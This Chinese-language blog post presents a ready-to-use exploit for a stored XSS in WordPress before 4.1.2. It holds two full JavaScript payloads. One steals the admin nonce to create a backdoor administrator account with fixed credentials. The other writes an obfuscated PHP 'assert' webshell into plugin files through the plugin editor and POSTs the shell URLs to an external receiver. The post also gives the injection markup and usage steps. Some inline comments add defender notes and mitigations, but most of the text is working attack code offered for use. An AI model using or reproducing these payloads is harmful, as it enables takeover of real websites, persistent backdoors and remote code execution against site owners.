Wordpress < 4.1.2 存储型XSS EXP

ph发了一个wp的xss的poc,然后有人问我要exp..

其实Jin神早就在zone里发过了,这里直接稍微改改引用就能成功执行添加管理员或getshell

代码如下:(转载请注明原创0x_Jin)


1.添加管理员

// Snippet 1: executes inside a logged-in WordPress administrator's browser
// (delivered through the stored XSS this page is about). Every request below is
// same-origin, so the browser attaches the admin's session cookies to it.
var a = location.href.split('/');
// Rewrite the current wp-admin URL so its last path segment becomes user-new.php.
var xurl = location.href.replace(a[a.length-1],"user-new.php");
// Fetch the "Add New User" form as HTML.
jQuery.ajax({
  url: xurl,
  type: 'GET',
  dataType: 'html',
  data: {},
})
.done(function(data) {
  var temp = jQuery(data);
  var Xtoken = "";
  // Read the create-user nonce out of the fetched form. The nonce is a CSRF
  // defence; it offers no protection here because script already running in the
  // admin's origin can read the page that contains it.
  temp.find('input#_wpnonce_create-user').each(function(i,o){
    var o=jQuery(o);
    Xtoken=o.attr('value');
  });
  // Submit the form with role=administrator.
  // Defender note: the observable artefact is a new administrator account
  // (here the login "0x_Jin") created through user-new.php from an existing
  // admin session; alert on new-administrator events and on a GET/POST pair
  // against user-new.php with a Referer from an unrelated wp-admin page.
  jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'0x_Jin','email':'root@xss1.com','first_name':'0x_Jin','last_name':'0x_Jin','url':'www.xss1.com','pass1':'fuckxssQ','pass2':'fuckxssQ','role':'administrator','createuser':'Add+New+User+'}
  })
  .done(function(){
    // Success is only reported to the browser console.
    console.log('ok');
    return;
  })
})
.fail(function() {
  // The initial GET failed (e.g. not logged in / no wp-admin context).
  console.log("error");
})
.always(function() {
  return;
});


2.getshell

/*
0x_Jin WordPress Getshell
*/
// Callback used by the getshell snippet below: POSTs `data` (the resulting
// file URL, or the string "error") to a fixed external receiver. The hostname
// here is a placeholder that the notes at the bottom of the page tell the
// reader to replace.
// Defender note: an administrator's browser issuing POST requests to an
// off-site host immediately after plugin-editor.php activity is a strong
// exfiltration indicator; a Content-Security-Policy with a restrictive
// connect-src on wp-admin pages would also block this request.
function SenData(data){
    jQuery.ajax({
        url: 'http://www.test.com/post.php',
        type: 'POST',
        data:{"Data":data}
    })
}
// Snippet 2: abuses WordPress's built-in plugin editor (wp-admin/plugin-editor.php)
// from the admin's session to write PHP into a plugin file.
// Mitigations: define DISALLOW_FILE_EDIT in wp-config.php so the editor is
// removed entirely, keep core updated (the XSS itself is fixed in 4.1.2), and
// run file-integrity monitoring on wp-content/plugins.
var a = location.href.split('/');
// Name of the plugin file currently open in the editor (filled in below).
var file = "";
// Same rewrite as in snippet 1: last path segment -> plugin-editor.php.
var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");
// All plugin files listed in the editor's drop-down.
var file2 = [];
// 0 keeps the "every other plugin file" loop further down disabled, so only the
// file currently open in the editor is touched.
var StartGetshell = 0;
// The PHP fragment that replaces the leading '<?php' of the edited file (what
// the page calls the webshell).
var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);';
// Fetch the editor page as HTML.
jQuery.ajax({
  url: xurl,
  type: 'GET',
  dataType: 'html',
  data: {},
})
.done(function(data) {
  var temp = jQuery(data);
  var Xtoken = "";
  var Tmpcode = "";
  // Nonce protecting the editor form; readable same-origin, so it does not stop
  // injected script (same point as in snippet 1).
  temp.find('input#_wpnonce').each(function(i,o){
    var o=jQuery(o);
    Xtoken=o.attr('value');
  });
  // Current file contents with the first '<?php' swapped for the payload
  // (String.prototype.replace with a string pattern replaces one occurrence).
  temp.find('textarea#newcontent').each(function(i,o){
    var o=jQuery(o);
    Tmpcode = o.text().replace('<?php',shellcode);    
  })
  // The editor shows the open file's name in this heading.
  temp.find('div.alignleft big strong').each(function(i,o){
    var o=jQuery(o);
    file = o.text();
  })
  // Collect every selectable plugin file; only used when StartGetshell is set.
  temp.find('select#plugin option').each(function(i,o){
    var o=jQuery(o);
    file2.push(o.attr('value'));
  })
  // Proceed only if nonce, modified content and filename were all found.
  if(Xtoken&&Tmpcode&&file){
    // Save the modified file through the editor's normal 'update' action.
    // Defender note: a POST to plugin-editor.php with action=update is the
    // server-side event to audit; WordPress itself does not log file edits.
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
    })
    .done(function(){
      // Derive the public URL of the modified file from the wp-admin URL and
      // log it to the console.
      var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
      console.info('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+file));
      return;
    })  
  }
  // Disabled by default (StartGetshell = 0): repeat the same write against
  // every other plugin file from the drop-down, reporting each result via
  // SenData instead of the console.
  if(StartGetshell){
    for(var i=0;i<file2.length;i++){
      var filename = file2[i];
      if(file2[i]!=file){
        // Select the next file in the editor to obtain its contents and nonce.
        jQuery.ajax({
          url: xurl,
          type: 'POST',
          data: {'plugin': file2[i],'Submit':'Select'},
        })
        .done(function(data) {
          var NewCode = "";
          var NewToken= "";
          var Getshell=jQuery(data);
          Getshell.find("textarea#newcontent").each(function(i,o){
            var o=jQuery(o);
            NewCode = o.text().replace('<?php',shellcode);    
          })
          Getshell.find("input#_wpnonce").each(function(i,o){
            var o=jQuery(o);
            NewToken = o.attr('value');
          })
          if(NewCode&&NewToken){
            console.log("1"+filename);
            jQuery.ajax({
            url: xurl,
            type: 'POST',
            data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
            })
            .done(function(){
              var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
              // Result is sent to the external receiver defined in SenData.
              SenData('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+filename));
              return;
            })  
          }
        })      
      }
    }
  }
})
.fail(function() {
  // The initial GET of plugin-editor.php failed; reported off-site.
  SenData("error");
})
.always(function() {
  return;
});



使用方法:将代码复制并且保存为xxx.js然后上传到任意服务器、空间,然后使用ph牛发出来的语句测试.

test <abbr title="qweqw style=display:block;position:fixed;width:100%;height:100%;top:0; onmouseover=s=createElement(String.fromCharCode(115,99,114,105,112,116));body.appendChild(s); s.src=String.fromCharCode(你编码后的地址)// "截断字符">


PS:由于此跨站字符会产生截断...请去ph牛的博客复制吧。http://www.leavesongs.com/HTML/wordpress-4-1-stored-xss.html

- -!!(文章果然差点白写了..懒得处理了。)

PS:使用getshell请将接收地址换成自己的,在代码第6行修改

PS:添加的管理员,帐号密码是:0x_Jin:fuckxssQ

(成功就去感谢他吧,失败别来找我..我只是搬运工)
